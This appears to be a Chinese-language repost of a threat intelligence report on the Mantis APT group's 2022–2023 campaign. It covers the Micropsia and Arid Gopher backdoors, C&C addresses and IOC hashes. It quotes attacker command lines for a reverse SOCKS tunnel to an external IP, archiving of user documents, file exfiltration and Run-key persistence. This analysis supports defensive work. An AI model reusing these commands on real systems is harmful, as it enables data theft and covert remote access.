背景
Mantis自2014年起活跃,一些第三方报告显示其可能早在2011年就已经活动。该团体以针对以色列和其他一些中东国家的组织为目标而知名。目标领域包括政府、军事、金融、媒体、教育、能源和智库。该团体以使用网络钓鱼邮件和假社交媒体个人资料来诱使目标在他们的设备上安装恶意软件而知名。
Mantis被广泛认为与巴勒斯坦领土有联系。尽管其他供应商将该团体与哈马斯联系起来,但赛门铁克无法对任何巴勒斯坦组织做出明确的归属。
在其最新的攻击中,该团体使用了其定制的Micropsia和Arid Gopher后门程序的更新版本来感染目标,随后进行广泛的凭证盗窃和窃取数据的外泄。
攻击链
此次活动的初始感染途径尚不明确。在一个被针对的组织中,攻击者部署了三个不同版本的相同工具集(即相同工具的不同变体)在三组计算机上。以这种方式隔离攻击很可能是一个预防措施。如果其中一个工具集被发现,攻击者仍然能够在目标网络上保持其持久存在。
以下是其中三个工具集之一使用情况的描述:
首次发现恶意活动是在2022年12月18日。执行了三套独立的混淆PowerShell命令来载入一个Base64编码的字符串,该字符串启动了嵌入的shellcode。shellcode是一个32位的引导程序,它使用基本的TCP协议从命令和控制(C&C)服务器:104.194.222[.]50端口4444下载另一个阶段。
攻击者于12月19日返回,先进行凭证转储,然后使用Certutil和BITSAdmin下载了Micropsia后门和Putty,一个公开可用的SSH客户端。
Micropsia随后执行并开始与C&C服务器联系。同一天,Micropsia也在同一组织的其他三台机器上执行。在每种情况下,它都运行在一个以其文件名命名的文件夹中:
csidl_common_appdata\systempropertiesinternationaltime\systempropertiesinternationaltime.exe
csidl_common_appdata\windowsnetworkmanager\windowsnetworkmanager.exe
csidl_common_appdata\windowsps\windowsps.exe
在一台计算机上,Micropsia被用来设置一个反向socks隧道到一个外部IP地址:
CSIDL_COMMON_APPDATA\windowsservicemanageav\windowsservicemanageav.exe -connect 104.194.222[.]50:443 [已编辑]
12月20日,Micropsia被用来在其中一台受感染的计算机上运行一个名为windowspackages.exe的未知可执行文件。
次日,12月21日,RAR被执行来在另一台受感染的计算机上归档文件。
从12月22日到2023年1月2日,Micropsia被用来在三台受感染的计算机上执行Arid Gopher后门。Arid Gopher反过来被用来运行名为SetRegRunKey.exe的工具,它通过在注册表中添加Arid Gopher以实现在重启时执行,从而提供持久性。它还运行了一个名为localsecuritypolicy.exe的未知文件(攻击者在其他地方使用这个文件名作为Arid Gopher后门)。
在12月28日,Micropsia被用来在另外三台受感染的计算机上运行windowspackages.exe。
12月31日,Arid Gopher执行了两个未知文件名为networkswitcherdatamodell.exe和networkuefidiagsbootserver.exe的文件在两台受感染的计算机上。
到了1月2日,攻击者停用了他们正在使用的Arid Gopher版本,并引入了一个新变体。这是因为第一个版本被发现,还是标准操作程序不清楚。
1月4日,Micropsia被用来在单个计算机上执行两个未知文件,均名为hostupbroker.exe,来自文件夹:csidl_common_appdata\hostupbroker\hostupbroker.exe。这紧接着是RAR文件的外泄:
CSIDL_COMMON_APPDATA\windowsupserv\windowsupserv.exe -f CSIDL_COMMON_APPDATA\windowspackages\01-04-2023-15-13-39_getf.rar
1月9日,Arid Gopher被用来在单个计算机上执行两个未知文件:
csidl_common_appdata\teamviewrremoteservice\teamviewrremoteservice.exe
csidl_common_appdata\embededmodeservice\embededmodeservice.exe
最后的恶意活动发生在1月12日之后,当Arid Gopher被用来每十小时执行一次未知文件名为localsecuritypolicy.exe。
Micropsia
在这些攻击中使用的Micropsia后门变体似乎是其他供应商看到的版本的略微更新版本。在这次活动中,Micropsia使用了多个文件名和文件路径部署:
csidl_common_appdata\microsoft\dotnet35\microsoftdotnet35.exe
csidl_common_appdata\microsoftservicesusermanual\systempropertiesinternationaltime.exe
csidl_common_appdata\systempropertiesinternationaltime\systempropertiesinternationaltime.exe
csidl_common_appdata\windowsnetworkmanager\windowsnetworkmanager.exe
csidl_common_appdata\windowsps\windowsps.exe
Micropsia使用WMI执行,其主要目的似乎是运行攻击者的二级有效载荷。这些包括:
Arid Gopher(文件名:networkvirtualizationstartservice.exe, networkvirtualizationfiaservice.exe, networkvirtualizationseoservice.exe)
Reverse SOCKs Tunneler(又名Revsocks)(文件名:windowsservicemanageav.exe)
数据外泄工具(文件名:windowsupserv.exe)
两个未知文件,均命名为hostupbroker.exe
未知文件名为windowspackages.exe
除此之外,Micropsia具有自己的功能,如截屏、键盘记录,以及使用WinRAR归档某些文件类型以准备数据外泄:
“%PROGRAMDATA%\Software Distributions\WinRAR\Rar.exe” a-r -ep1 -v2500k -hp71012f4c6bdeeb73ae2e2196aa00bf59_d01247a1eaf1c24ffbc851e883e67f9b -ta2023-01-14 “%PROGRAMDATA%\Software Distributions\Bdl\LMth__C_2023-02-13 17-14-41” “%USERPROFILE%*.xls” “%USERPROFILE%*.xlsx” “%USERPROFILE%*.doc” “%USERPROFILE%*.docx” “%USERPROFILE%*.csv” “%USERPROFILE%*.pdf” “%USERPROFILE%*.ppt” “%USERPROFILE%*.pptx” “%USERPROFILE%*.odt” “%USERPROFILE%*.mdb” “%USERPROFILE%*.accdb” “%USERPROFILE%*.accde” “%USERPROFILE%*.txt” “%USERPROFILE%*.rtf” “%USERPROFILE%*.vcf”
Arid Gopher
Arid Gopher与Micropsia不同,后者使用Delphi编写,Arid Gopher是用Go语言编写的。在此次活动中使用的Arid Gopher版本包含以下嵌入组件:
7za.exe – 一个合法的7-Zip可执行文件的副本
AttestationWmiProvider.exe – 一个工具,用于设置“运行”注册表值
ServiceHubIdentityHost.exe – Optimum X的合法Shortcut.exe可执行文件的副本
Setup.env – 配置文件
Arid Gopher还被用来启动以下未知文件:networkswitcherdatamodell.exe、localsecuritypolicy.exe和networkuefidiagsbootserver.exe,除此之外,它还被用来下载和执行使用PyArmor混淆的文件。
当与C&C服务器通信时,Arid Gopher在一个路径上注册设备,然后连接到另一个路径,可能是为了接收命令:
连接至:http://jumpstartmail[.]com/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv (IP: 79.133.51[.]134) – 可能为了注册设备
接着是:http://jumpstartmail[.]com/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC – 可能为了接收命令
连接至:http://salimafia[.]net/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv (IP: 146.19.233[.]32) – 可能为了注册设备
接着是:http://salimafia[.]net/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC – 可能为了接收命令
Arid Gopher似乎被攻击者定期更新和重写,很可能是为了逃避检测。一种变体的恶意软件与以前版本的独特代码大不相同,以至于没有一个子程序包含与前一个版本相同的独特代码。Mantis似乎在变体之间积极变换逻辑,如果手动完成,这是一个耗时的操作。
| Command | Description |
|---|---|
| “c” | Perhaps related to main.exC(“cmd”) |
| “d” | Perhaps related to main.down2 |
| “s” | Perhaps related to main.OnDSH |
| “ci” | Perhaps related to main.deviceProperties |
| “ps” | Perhaps related to main.exC(“powershell”) |
| “ra” | Perhaps related to main.RunAWithoutW |
| “sf” | Perhaps related to main.updateSettings |
| “sl” | Perhaps related to main.searchForLogs |
| “ua” | Perhaps related to main.updateApp |
| “ut” | Perhaps related to main.updateT |
| “pwnr” | Perhaps related to main.exCWithoutW(“powershell”) |
| “rapp” | Perhaps related to main.restartApp |
| “gelog” | Perhaps related to main.upAppLogs |
| “ufbtt” | Perhaps related to main.collectFi |
| “ufofd” | Perhaps related to main.collectFiOrFol |
| “bwp” | Perhaps related to main.browDat |
| “cbh” | Perhaps related to main.delBD |
| “cwr” | Perhaps related to main.exCWithoutW(“cmd”) |
| “gaf” | Perhaps related to main.collectFi |
| “ntf” | Perhaps related to main.collectNet |
| “smr” | Perhaps related to main.updateSettings |
嵌入的setup.env文件被一个分析的Arid Gopher变体用来检索配置数据,包含以下内容:
DIR=WindowsPerceptionService
ENDPOINT=http://jumpstartmail[.]com/IURTIER3BNV4ER
LOGS=logs.txt
DID=code.txt
VER=6.1
EN=2
ST_METHOD=r
ST_MACHINE=false
ST_FLAGS=x
COMPRESSOR=7za.exe
DDIR=ResourcesFiles
BW_TOO_ID=7463b9da-7606-11ed-a1eb-0242ac120002
SERVER_TOKEN=PDqMKZ91l2XDmDELOrKB
STAPP=AttestationWmiProvider.exe
SHORT_APP=ServiceHubIdentityHost.exe
setup.env配置文件提到另一个文件AttestationWmiProvider.exe,也嵌入在Arid Gopher中。该文件是一个用作助手的32位可执行文件,确保另一个可执行文件在重启时运行。当它执行时,它会检查以下命令行参数:
“key” 带字符串参数 [RUN_VALUE_NAME]
“value” 带字符串参数 [RUN_PATHNAME]
然后它安排接收信号使用func os/signal.Notify()的通知。一旦收到通知,它设置以下注册表值:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”[RUN_VALUE_NAME]” = “[RUN_PATHNAME]”
我们迄今为止的调查显示,这个文件设置Arid Gopher在重启时运行:
CSIDL_COMMON_APPDATA\attestationwmiprovider\attestationwmiprovider.exe -key=NetworkVirtualizationStartService “-value=CSIDL_COMMON_APPDATA\networkvirtualizationstartservice\networkvirtualizationstartservice.exe -x”
数据外泄工具
攻击者还使用了一个定制的工具来外泄从目标组织窃取的数据:名为WindowsUpServ.exe的64位PyInstaller可执行文件。当运行时,该工具检查以下命令行参数:
“-d” “[FILE_DIRECTORY]”
“-f” “[FILENAME]”
对于每个”-f” “[FILENAME]”命令行参数,该工具上传[FILENAME]的内容。对于每个”-d” “[FILE_DIRECTORY]”命令行参数,该工具获取存储在文件夹[FILE_DIRECTORY]中的文件列表,并上传每个文件的内容。
当上传每个文件时,工具向C&C服务器发送一个HTTP POST请求,带有以下参数:
“kjdfnqweb”: [THE_FILE_CONTENT]
“qyiwekq”: [HOSTNAME_OF_THE_AFFECTED_COMPUTER]
每当远程服务器以状态码200响应时,恶意软件会从本地磁盘删除上传的文件。恶意软件还可能在以下文件中记录其一些行为:
“C:\ProgramData\WindowsUpServ\success.txt”
“C:\ProgramData\WindowsUpServ\err.txt”
坚定的对手
Mantis似乎是一个决心坚定的对手,愿意投入时间和精力以最大化其成功机会,这一点从广泛的恶意软件重写和其将针对单个组织的攻击分割成多个独立部分以减少整个行动被检测到的机会可以看出。
IOC指标
| SHA256 hash | File name | Description |
|---|---|---|
| 0fb4d09a29b9ca50bc98cb1f0d23bfc21cb1ab602050ce786c86bd2bb6050311 | networkvirtualizationservice.exe | Arid Gopher |
| 3d649b84df687da1429c2214d6f271cc9c026eb4a248254b9bfd438f4973e529 | networkvirtualizationpicservice.exe | Arid Gopher |
| 82f734f2b1ccc44a93b8f787f5c9b4eca09efd9e8dcd90c80ab355a496208fe4 | networkvirtualizationfiaservice.exe | Arid Gopher |
| 85b083b431c6dab2dd4d6484fe0749ab4acba50842591292fdb40e14ce19d097 | networkvirtualizationinithservice.exe | Arid Gopher |
| cb765467dd9948aa0bfff18214ddec9e993a141a5fdd8750b451fd5b37b16341 | networkvirtualizationfiaservice.exe | Arid Gopher |
| f2168eca27fbee69f0c683d07c2c5051c8f3214f8841c05d48897a1a9e2b31f8 | networkvirtualizationstartservice.exe | Arid Gopher |
| 21708cea44e38d0ef3c608b25933349d54c35e392f7c668c28f3cf253f6f9db8 | AttestationWmiProvider.exe | Arid Gopher persistence component |
| 58331695280fc94b3e7d31a52c6a567a4508dc7be6bdc200f23f5f1c72a3f724 | windowsupserv.exe | Exfiltration tool |
| 5af853164cc444f380a083ed528404495f30d2336ebe0f2d58970449688db39e | windowsupserv.exe | Exfiltration tool |
| 0a6247759679c92e1d2d2907ce374e4d6112a79fe764a6254baff4d14ac55038 | Various | Micropsia |
| 1d1a0f39f339d1ddd506a3c5a69a9bc1e411e057fe9115352482a20b63f609aa | N/A | Micropsia |
| 211f04160aa40c11637782973859f44fd623cb5e9f9c83df704cc21c4e18857d | xboxaccessorymanagementservice.exe | Micropsia |
| d10a2dda29dbf669a32e4198657216698f3e0e3832411e53bd59f067298a9798 | systempropertiesinternationaltime.exe | Micropsia |
| 5405ff84473abccc5526310903fcc4f7ad79a03af9f509b6bca61f1db8793ee4 | networkvirtualizationseoservice.exe | Possible Arid Gopher |
| f38ad4aa79b1b448c4b70e65aecc58d3f3c7eea54feb46bdb5d10fb92d880203 | runme.exe | Possible Meterpreter |
| c4b9ad35b92408fa85b92b110fe355b3b996782ceaafce7feca44977c037556b | systempropertiesinternationaltime.exe | Possible Micropsia |
| f98bc2ccac647b93f7f7654738ce52c13ab477bf0fa981a5bf5b712b97482dfb | windowsservicemanageav.exe | ReverseSocksTunnel |
| 411086a626151dc511ab799106cfa95b1104f4010fe7aec50b9ca81d6a64d299 | N/A | Shellcode |
| 5ea6bdae7b867b994511d9c648090068a6f50cb768f90e62f79cd8745f53874d | N/A | Shellcode |
| 6a0686323df1969e947c6537bb404074360f27b56901fa2bac97ae62c399e061 | N/A | Shellcode |
| 11b81288e5ed3541498a4f0fd20424ed1d9bd1e4fae5e6b8988df364e8c02c4e | SystemPropertiesInternationalTime.rar | Unknown file |
| 1b62730d836ba612c3f56fa8c3b0b5a282379869d34e841f4dca411dce465ff6 | networkswitcherdatamodell.exe | Unknown file |
| 220eba0feb946272023c384c8609e9242e5692923f85f348b05d0ec354e7ac3c | hostupbroker.exe | Unknown file |
| 4840214a7c4089c18b655bd8a19d38252af21d7dd048591f0af12954232b267f | hostupbroker.exe | Unknown file |
| 4a25ca8c827e6d84079d61bd6eba563136837a0e9774fd73610f60b67dca6c02 | windowspackages.exe | Unknown file |
| 624705483de465ff358ffed8939231e402b0f024794cf3ded9c9fc771b7d3689 | _pytransform.dll | Unknown file |
| 7ae97402ec6d973f6fb0743b47a24254aaa94978806d968455d919ee979c6bb4 | embededmodeservice.exe | Unknown file |
| 8d1c7d1de4cb42aa5dee3c98c3ac637aebfb0d6220d406145e6dc459a4c741b2 | localsecuritypolicy.exe | Unknown file |
| b6a71ca21bb5f400ff3346aa5c42ad2faea4ab3f067a4111fd9085d8472c53e3 | embededmodeservice.exe | Unknown file |
| bb6fd3f9401ef3d0cc5195c7114764c20a6356c63790b0ced2baceb8b0bdac51 | localsecuritypolicy.exe | Unknown file |
| bc9a4df856a8abde9e06c5d65d3bf34a4fba7b9907e32fb1c04d419cca4b4ff9 | networkuefidiagsbootserver.exe | Unknown file |
| d420b123859f5d902cb51cce992083370bbd9deca8fa106322af1547d94ce842 | teamviewrremoteservice.exe | Unknown file |
| jumpstartmail[.]com | Arid Gopher C&C | |
| paydayloansnew[.]com | Arid Gopher C&C | |
| picture-world[.]info | Arid Gopher C&C | |
| rnacgroup[.]com | C&C | |
| salimafia[.]net | Arid Gopher C&C | |
| seomoi[.]net | Arid Gopher C&C | |
| soft-utils[.]com | C&C | |
| chloe-boreman[.]com | Micropsia C&C | |
| criston-cole[.]com | Micropsia C&C | |
| http://5.182.39[.]44/esuzmwmrtajj/cmsnvbyawttf/mkxnhqwdywbu | Exfiltration tool C&C |
原创文章,作者:首席安全官,如若转载,请注明出处:https://www.cncso.com/mantis-used-in-attacks-against-palestinian-targets.html
